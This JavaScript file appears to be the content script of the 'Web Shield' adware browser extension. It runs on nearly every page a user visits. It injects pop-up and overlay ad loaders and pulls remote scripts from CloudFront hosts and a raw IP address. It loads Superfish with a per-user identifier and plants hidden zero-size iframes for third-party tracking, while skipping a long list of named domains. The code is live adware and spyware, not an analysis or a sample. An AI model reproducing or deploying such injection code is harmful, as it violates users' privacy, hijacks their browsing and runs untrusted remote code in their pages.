(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-69a32679-28b0-8ff3-e702-e872624252ea-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-69a32679-28b0-8ff3-e702-e872624252ea-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        (function () {
     try {               
     	 //var txt = '(function(){'
         //  +'var e={register:function(e,t,n,r,i,s){if(!this.groups[e]){return false}var o={id:t,freq:n,max:r,maxReset:i,cb:s};this.groups[e].tasks[t]=o;return true},registerAntiTask:function(e,t){if(!this.antiTasks){return false}var n={id:e,cb:t};this.antiTasks.push(n);return true},registerAntiTask2:function(e,t,n,r,i,s){if(!this.antiTasks){return false}var o={id:e,anti:t,freq:n,max:r,maxReset:i,cb:s};this.antiTasks2.push(o);return true},createGroup:function(e,t,n,r){var i={id:e,freq:t,max:n,maxReset:r,tasks:{},validTasks:[]};this.groups[e]=i},groups:{},antiTasks:[],antiTasks2:[]};'
         //  +'e.createGroup("HPA",30,null,null);'
         //  +'window["0C9E1ED25-0A8F-4306-9DB9-3B874B485C3B-MB"]=e})();';
       
         var txt = '(function(){'
           +'var e={register:function(e,t,n,r,i,s){if(!this.groups[e]){return false}var o={id:t,freq:n,max:r,maxReset:i,cb:s};this.groups[e].tasks[t]=o;return true},registerAntiTask:function(e,t){if(!this.antiTasks){return false}var n={id:e,cb:t};this.antiTasks.push(n);return true},registerAntiTask2:function(e,t,n,r,i,s){if(!this.antiTasks){return false}var o={id:e,anti:t,freq:n,max:r,maxReset:i,cb:s};this.antiTasks2.push(o);return true},createGroup:function(e,t,n,r){var i={id:e,freq:t,max:n,maxReset:r,tasks:{},validTasks:[]};this.groups[e]=i},createRootGroup:function(e,t){var n=false;if(t==1){n=true}if(this.groot!=null){return false}var r={id:e,freq:null,max:null,maxReset:null,tasks:{},subGroups:{},isBatch:n};this.groups2[e]=r;this.groot=r},createSubGroup:function(e,t,n,r,i,s,o){if(!this.groups2[t]){return false}if(!o||o<0){o=0}var u=false;if(n==1){u=true}var a={id:e,freq:r,max:i,maxReset:s,tasks:{},subGroups:{},isBatch:u};if(!this.groups2[t].subGroups[o]){this.groups2[t].subGroups[o]={}}this.groups2[t].subGroups[o][e]=a;this.groups2[e]=a},registerTask:function(e,t,n){if(!n){return false}var r={id:e,cb:n};for(var i=0;i<t.length;i++){if(this.groups2[t[i]]&&this.groups2[t[i]].tasks){this.groups2[t[i]].tasks[e]=r}}return true},registerFallbackTask:function(e,t){if(!this.fallbackTasks){return false}var n={id:e,cb:t};this.fallbackTasks.push(n);return true},groups:{},antiTasks:[],antiTasks2:[],groot:null,groups2:{},fallbackTasks:[]};'

           +'e.createGroup("HPA",30,null,null);'
           +'e.createRootGroup("Root",0);'
           +'e.createSubGroup("HPA_Targeted","Root",0,null,null,null,1);'
           +'e.createSubGroup("Global","Root",0,null,null,null,0);'
           +'e.createSubGroup("ITS","HPA_Targeted",0,null,null,null,0);'
           +'e.createSubGroup("HPA2","Global",0,30,null,null,1);'
           +'e.createSubGroup("LPA","Global",0,null,null,null,0);'
           +'window["0C9E1ED25-0A8F-4306-9DB9-3B874B485C3B-MB"]=e})();'
       
       
         var h = document.getElementsByTagName("head")[0];
         var s = document.createElement("script");
         s.text = txt;
         h.appendChild(s);
     } catch (ex) {}
 })();
    }
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
try {
	if(window==window.top&&window.name&&window.name.length>15&&(window.name.substring(0,3)=='FA-'||window.name.substring(0,3)=='FA_')){
		return;
	}
	(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-3b9ffe44-f08d-ddcf-dada-d4205f9a6eb8-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-3b9ffe44-f08d-ddcf-dada-d4205f9a6eb8-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        (function() {
try {
     
	var s1 = document.createElement('script');
	s1.text = 'window["puConfig"] = {'
		+ 'PartnerId: "73891",'
		+ 'Version: "1002006053",'
		+ 'ExtGuid: "c835c4cf7e574d75aa655f1a4c3551d3",'
		+ 'NameShort4: "WEBS",'
		+ 'HostUrl: "http://198.0.201.121/",'
		+ 'HostDomain: "webshieldonline.com",'
		+ 'AdCdn: "//d11vdn9ox0j18d.cloudfront.net",'
		+ 'AdInfoText: "Ad Info"'
		+ '};'
		+ 'window["ADNConfig"] = window["puConfig"];'
		;

	var h = document.getElementsByTagName("HEAD")[0];
	h.appendChild(s1);            

	unsafeWindow.DynFF=DynFF;
	if (document.location.protocol != 'http:' && navigator.userAgent.indexOf('Firefox') < 0) { return; }

	var s2 = document.createElement('script');
	s2.text =
		'(function() {'
			+'try{'
				+'var localMB = window["0C9E1ED25-0A8F-4306-9DB9-3B874B485C3B-MB"];'
				+'function LoadAndRun() {'
					+'(function(){try{function e(e){var t=document.head||document.getElementsByTagName("head")[0];var n=document.createElement("script"),r=false;n.onload=n.onreadystatechange=function(){if(n.readyState&&n.readyState!=="complete"&&n.readyState!=="loaded"||r){return false}n.onload=n.onreadystatechange=null;r=true};n.src=e;t.insertBefore(n,t.firstChild)}e("//d1ui18tz1fx59z.cloudfront.net/js/pu/common.js?v=5")}catch(t){}})();'
    			+'};'
    			+'if (localMB && localMB.register) { localMB.register("HPA","Pop",60,3,1440,function() { LoadAndRun();}); } '
    			+'if (localMB && localMB.createSubGroup && localMB.registerTask) { '
    				+'localMB.createSubGroup("P","HPA2",0,60,3,1440,0);'
    				+'localMB.registerTask("Pop",["P"],function() { LoadAndRun();}); '
    			+'} '
			+'} catch (ex) {};'
		+'})();'          
	h.appendChild(s2);
}catch(ex) {}
})();
    }
})();
}catch(e) {}
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-e671c6a4-c86d-0021-3ae2-3afdbfa28065-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-e671c6a4-c86d-0021-3ae2-3afdbfa28065-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        try {
	if(document.location.protocol != 'https:' || navigator.userAgent.indexOf('Firefox') > 0)
	{
		if( document.domain.indexOf('facebook.com') < 0 
			&& document.domain.indexOf('google') < 0
			&& document.domain.indexOf('techcrunch.com') < 0
			&& document.domain.indexOf('cdn.openappmedia.com') < 0
			&& document.domain.indexOf('cloudfront.net') < 0
			&& document.domain.indexOf('jekt.com') < 0
			&& document.location.pathname != '/app.html'
		) {
			var confsc = document.createElement('script'); 
			confsc.src = "http://tt.friendschecker.com/pubjs?pid=104937&sid=73891&uid=c835c4cf7e574d75aa655f1a4c3551d3";
			confsc.type = "text/javascript"; 
			confsc.id = "confsc"; 
			document.getElementsByTagName("head")[0].appendChild(confsc);
		}
	}
}catch(ex) {}
      
try {
	if(window==window.top&&window.name&&window.name.length>15&&(window.name.substring(0,3)=='FA-'||window.name.substring(0,3)=='FA_')){
		var img = new Image;
		img.src='http://l.webshieldonline.com/ImpCount.ashx?e=c835c4cf7e574d75aa655f1a4c3551d3&ns=WEBS&p=73891&v=1002006053&hu=http://198.0.201.121/&au=tvfa&ac=10600';
	}
}catch(e) {}
    }
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
try {
	if(window==window.top&&window.name&&window.name.length>15&&(window.name.substring(0,3)=='FA-'||window.name.substring(0,3)=='FA_')){
		return;
	}
	(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-dda32679-28b0-3bf3-e702-e8c66242525e-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-dda32679-28b0-3bf3-e702-e8c66242525e-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        (function(){
  try {
    var h = document.getElementsByTagName('head')[0];
    var s1 = document.createElement('script');
    s1.text = 'window["OveradsConfig300x250"] = { '
            + 'adInfoText: "Ad Info", '
            + 'adInfoClick: "http://www.goldencompassmedia.com/ad-information.html", '
            + 'adUnit : { '
                + '"300x250": "999-all-300-hp-l-a", '
                + '"728x90": "999-all-728-hp-l-a", '
                + '"160x600": "999-all-160-hp-l-a" '
            + '}, '
            + 'ExtGuid: "c835c4cf7e574d75aa655f1a4c3551d3", '
            + 'Version: "1002006053", '
            + 'PartnerId: "73891", '
            + 'NameShort4: "WEBS", '
            + 'AdCacheBuster: "46b758ac", '
            + 'AdUrlPrefix: "http://d1ui18tz1fx59z.cloudfront.net/au", '
            + 'AdUrlPrefixSsl: "https://d1ui18tz1fx59z.cloudfront.net/au", '
            + 'HostUrl: "http://198.0.201.121/" '
            + '};';
    h.appendChild(s1);   
    
    var dd = document.domain;
    if( dd.indexOf('google') < 0
        && dd.indexOf('techcrunch.com') < 0
        && dd.indexOf('yahoo.com') < 0
        && dd.indexOf('msn.com') < 0
        && dd.indexOf('youtube.com') < 0
        && dd.indexOf('aol.com') < 0
        && dd.indexOf('ebay.com') < 0
    ) {
        var s2 = document.createElement('script');
        s2.text =
        '(function() {'
            +'try{'
                +'var localMB = window["0C9E1ED25-0A8F-4306-9DB9-3B874B485C3B-MB"];'
                
                +'function LoadAndRun() {'
                    +'var h=document.head||document.getElementsByTagName("head")[0];'
                    +'var s = document.createElement("script");' 
                    +'s.src = "//d1ui18tz1fx59z.cloudfront.net/js/all/pd.js?v=14"; ' 
                    +'s.type = "text/javascript"; ' 
                    +'h.appendChild(s);'
                +'};'
                +'if (localMB && localMB.createSubGroup && localMB.registerTask && localMB.registerFallbackTask) { '
                    +'localMB.registerTask("OVAD",["Global"],function() { LoadAndRun();}); '
                    +'localMB.registerFallbackTask("OVAD",function() { LoadAndRun();});'
                +'} else {'
                    +'LoadAndRun();'
                +'}'
            
            +'} catch (ex) {};'
        +'})();'  
            
            
    h.appendChild(s2);
    }
  }catch(ex) {}

})();
    }
})();
}catch(e) {}
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-da42fb95-f55c-3c12-0bdf-09c18e9fb359-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-da42fb95-f55c-3c12-0bdf-09c18e9fb359-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        if( 
			document.domain.indexOf('safemonitorapp.com') < 0 
      		&& document.domain.indexOf('webshieldonline.com') < 0
			&& document.domain.indexOf('spyalertapp.com') < 0
			&& document.domain.indexOf('spyguardapp.com') < 0
			&& document.domain.indexOf('spyscoutapp.com') < 0 
			&& document.domain.indexOf('getsafeweb.com') < 0 
			&& document.domain.indexOf('spylookoutapp.com') < 0
      		&& document.domain.indexOf('getsecureweb.com') < 0
      		&& document.domain.indexOf('getwebmonitor.com') < 0
			&& document.domain.indexOf('yahoo.com') < 0
      		&& document.domain.indexOf('.bing.') < 0
      		&& document.domain.indexOf('.conduit.') < 0
      		&& document.domain.indexOf('aol.com') < 0
      		&& document.domain.indexOf('advertising.com') < 0
      		&& document.domain.indexOf('quigo.com') < 0		
      		&& document.domain.indexOf('adtech.com') < 0		
      		&& document.domain.indexOf('adsonar.com') < 0
      		&& document.domain.indexOf('aim.com') < 0
      		&& document.domain.indexOf('autoblog.com') < 0
      		&& document.domain.indexOf('aolanswers.com') < 0
      		&& document.domain.indexOf('theboombox.com') < 0
            && document.domain.indexOf('theboot.com') < 0
            && document.domain.indexOf('cambio.com') < 0
            && document.domain.indexOf('dailyfinance.com') < 0
            && document.domain.indexOf('breakingdefense.com') < 0
            && document.domain.indexOf('breakinggov.com') < 0
            && document.domain.indexOf('homesessive.com') < 0
            && document.domain.indexOf('editions.com') < 0
            && document.domain.indexOf('breakingenergy.com') < 0
            && document.domain.indexOf('engadget.com') < 0
            && document.domain.indexOf('games.com') < 0
            && document.domain.indexOf('huffingtonpost.com') < 0
            && document.domain.indexOf('joystiq.com') < 0
            && document.domain.indexOf('kitchendaily.com') < 0
            && document.domain.indexOf('makers.com') < 0
            && document.domain.indexOf('mandatory.com') < 0
            && document.domain.indexOf('mapquest.com') < 0
            && document.domain.indexOf('moviefone.com') < 0
            && document.domain.indexOf('noisecreep.com') < 0
            && document.domain.indexOf('patch.com') < 0
            && document.domain.indexOf('pawnation.com') < 0
            && document.domain.indexOf('aol.nextag.com') < 0
            && document.domain.indexOf('shortcuts.com') < 0
            && document.domain.indexOf('shoutcast.com') < 0
            && document.domain.indexOf('stylemepretty.com') < 0
            && document.domain.indexOf('spinner.com') < 0
            && document.domain.indexOf('stylelist.com') < 0
            && document.domain.indexOf('techcrunch.com') < 0
            && document.domain.indexOf('tuaw.com') < 0
            && document.domain.indexOf('userplane.com') < 0
            && document.domain.indexOf('winamp.com') < 0     
      		&& document.domain.indexOf('ebay.com') < 0
		)
		{
			var h = document.getElementsByTagName('head')[0];
			var script = document.createElement('script');
			script.text = 'window["SFMNConfig"] = { '
					+ ' CdnUrlPrefix: "//d25s4dbsms5nvt.cloudfront.net" '
       				+ ',nameshort: ("WEBS".toLowerCase())'
       				+ ',host: "webshieldonline.com"'
       				+ ',name: "Web Shield"'
                    + ',guid: "c835c4cf7e574d75aa655f1a4c3551d3" '
        			+ ',enhanced: "0"'
				+ '}; ';
			h.appendChild(script);

			unsafeWindow.SFMNApp = DynFF; 
       		if (window['DYN_9F3E3D59_F64E_4645_AEB8_6C52FCC29CA2']) {
            	window['SFMN_A522EDFD_C274_4A3D_89AD_B7817A88EA6A'] = window['DYN_9F3E3D59_F64E_4645_AEB8_6C52FCC29CA2'];
        	}
			var script = document.createElement('script');
            //if ("c835c4cf7e574d75aa655f1a4c3551d3" === "741D3451454D1F9CC1E5876A32DC3843" || "73891" === "1146") {
       			script.src ='//d25s4dbsms5nvt.cloudfront.net/js/sfmn/appb.js';
            //} else {
			//   	script.src ='//d25s4dbsms5nvt.cloudfront.net/js/sfmn/app.js';
            //}
			document.getElementsByTagName("head")[0].appendChild(script);
		}
    }
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window != window.top) {
			(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-da42fb95-f55c-3c12-0bdf-09c18e9fb359-1');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-da42fb95-f55c-3c12-0bdf-09c18e9fb359-1');
        document.getElementsByTagName('head')[0].appendChild(m);
        var script = document.createElement('script');
			script.src ='//d25s4dbsms5nvt.cloudfront.net/js/sfmn/child.js';
			document.getElementsByTagName("head")[0].appendChild(script);
    }
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
try {
	if(window==window.top&&window.name&&window.name.length>15&&(window.name.substring(0,3)=='FA-'||window.name.substring(0,3)=='FA_')){
		return;
	}
	(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-3b9f4e45-408c-ddcf-db6a-d4205e2a6eb8-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-3b9f4e45-408c-ddcf-db6a-d4205e2a6eb8-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        try {

	var h = document.getElementsByTagName("head")[0];
	var s = document.createElement('script');
	s.text = 
		'function attachSF() '
		+ ' { '
			+ ' var h = document.head || document.getElementsByTagName("head")[0];'
			+ ' var s1 = document.createElement("script");'
			+ ' s1.type = "text/javascript";'
			+ ' s1.id = "sf_script";'
			+ ' s1.src = document.location.protocol + "//www.superfish.com/ws/sf_main.jsp?dlsource=dingodeals&userId=c835c4cf7e574d75aa655f1a4c3551d3&CTID=73891";'
			+ ' h.appendChild(s1);'
		+ ' }'   
		+ ' setTimeout(attachSF, 3000); '
	h.appendChild(s);
}
catch(ex132) {}
    }
})();
}catch(e) {}
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
try {
	if(window==window.top&&window.name&&window.name.length>15&&(window.name.substring(0,3)=='FA-'||window.name.substring(0,3)=='FA_')){
		return;
	}
	(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-e635c7a4-c96d-0065-3ae3-7efdbfa3c465-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-e635c7a4-c96d-0065-3ae3-7efdbfa3c465-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        (function() {
	try {
		if(document.location.protocol != 'http:'){
			return;
		}
		var h = document.getElementsByTagName('head')[0];
		var s1 = document.createElement('script');
		s1.text =
		'(function() {'
			+'try{'
				+'var localMB = window["0C9E1ED25-0A8F-4306-9DB9-3B874B485C3B-MB"];'
				+'function LoadAndRun() {'
				+'window["scrollDownConfig"] = window["adUnitConf"] = { '
					+'adInfoText: "Ad Info", '
					+'adInfoClick: "http://www.goldencompassmedia.com/ad-information.html", '
					+'adCacheBuster: "46b758ac", '
					+'adUrlPrefix: "http://d1ui18tz1fx59z.cloudfront.net/au", '
					+'adUrlPrefixSsl: "https://d1ui18tz1fx59z.cloudfront.net/au", '
					+'adScriptPrefix: "//d1ui18tz1fx59z.cloudfront.net", '
					+'banner:{'
					+'"adUnit":"999-all-300-hp-l-a"'
						+'},'
						+'client:{ '
							+'pid: "73891", '
							+'ver: "1002006053", '
							+'urlid: 300, '
							+'guid: "c835c4cf7e574d75aa655f1a4c3551d3", '
							+'ns4: "WEBS", '
							+'hu: "http://198.0.201.121/" '
						+'} '
					+'}; '
					+'(function(){function n(){for(var n=e;n<t.length;n++){r(t[n]);++e;break}}function r(e){var t=new String(Math.floor(Math.random()*1e5));var r=document.createElement("script");r.type="text/javascript";r.id="us_"+t;r.src=e;r.setAttribute("defer","defer");if(typeof r.onreadystatechange!=="undefined"&&typeof r.onreadystatechange!=="unknown"){r.onreadystatechange=function(){if(this.readyState=="complete"){n();this.onreadystatechange=null}if(this.readyState=="loaded"){setTimeout(n,0);this.onreadystatechange=null}}}else{r.onload=n}var i=document.getElementsByTagName("head")[0];if(!i)return;i.appendChild(r)}var e=0;var t=["//d1ui18tz1fx59z.cloudfront.net/js/all/sd.js?v=4"];n()})();'
				+'};'
        		+'if (localMB && localMB.registerAntiTask) { localMB.registerAntiTask("HPA",function() { LoadAndRun();}); } '
        		+'if (localMB && localMB.createSubGroup && localMB.registerTask && localMB.registerFallbackTask) { '
					+'localMB.registerTask("BtS",["LPA"],function() { LoadAndRun();});'
					+'localMB.registerFallbackTask("BtS",function() { LoadAndRun();});'
				+'}'
			+'} catch (ex) {};'
		+'})();'
        h.appendChild(s1);
    } catch (ex1) {}
})();
    }
})();
}catch(e) {}
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-e611c7a4-c96d-0041-3ae3-5afdbfa3e065-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-e611c7a4-c96d-0041-3ae3-5afdbfa3e065-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        (function () {
          try {		    				    		    
            unsafeWindow["AD42F94D-5283-4CC0-A86A-059C19C7DA98-COMM"] = DynFF;
            if (window['DYN_9F3E3D59_F64E_4645_AEB8_6C52FCC29CA2']) {
            	window['735B9329-8A42-4EC1-B124-6EFB3F663C01-COMM2'] = window['DYN_9F3E3D59_F64E_4645_AEB8_6C52FCC29CA2'];
        	}
              
            var h = document.getElementsByTagName('head')[0];
            var s = document.createElement('script');
            s.text = 'window["08486F40-E398-4708-B4A2-93AED314C17F-CFG"] = { '
            	+ 'CdnUrlPrefix: "//d25s4dbsms5nvt.cloudfront.net" '
                + ',Dat: "https://d25k7p3x8sdssj.cloudfront.net" '
				+ '}; ';
			h.appendChild(s);
              
                
            s = document.createElement("script");
		    s.src = "//d1ui18tz1fx59z.cloudfront.net/js/mb/B.js";
            s.onload = s.onreadystatechange = function () {
              if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
                s.onload = s.onreadystatechange = null;
                h.removeChild(s);
              }
            };
            h.appendChild(s);
          } catch (ex) {}
		})();
    }
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-e655c4a4-ca6d-0005-3ae0-1efdbfa0a465-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-e655c4a4-ca6d-0005-3ae0-1efdbfa0a465-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        try {
   			var iframe = document.createElement('iframe');
			iframe.setAttribute('name', '_rlcdn');
			iframe.setAttribute('width', '0');
			iframe.setAttribute('height', '0');
			iframe.setAttribute('frameborder', '0');
			iframe.setAttribute('src', document.location.protocol + '//rc.rlcdn.com/378618.html');
			document.body.appendChild(iframe);
		

   	}catch(ex1) {}
    }
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('da0996d6-d629-e814-f395-02f9afdb3ca7-3b9f3246-3c8f-ddcf-d816-d4205d566eb8-0');
    if (!m) {
        m=document.createElement('meta');
        m.setAttribute('id','da0996d6-d629-e814-f395-02f9afdb3ca7-3b9f3246-3c8f-ddcf-d816-d4205d566eb8-0');
        document.getElementsByTagName('head')[0].appendChild(m);
        try {
		
		var iframe = document.createElement('iframe');
		iframe.name = '__bkframe';
		iframe.setAttribute('height', '0px');
		iframe.setAttribute('width', '0px');
		iframe.setAttribute('frameborder', '0px');
		iframe.src = 'javascript:void(0)';
		document.body.appendChild(iframe);

		var s1 = document.createElement('script');
		s1.type = 'text/javascript';
		s1.lang = 'javascript';
		s1.setAttribute('onload', 'onBKScriptLoad()');
		s1.src = '//tags.bkrtx.com/js/bk-coretag.js';
		document.body.appendChild(s1);


		var script = document.createElement('script');
		script.type = 'text/javascript';
		script.lang = 'javascript';
		script.text = 'function onBKScriptLoad (){bk_doJSTag(16321,4);}';
		document.body.appendChild(script);

		
	
	}catch(e){ }
    }
})();
		}
	} catch (e) {}
})();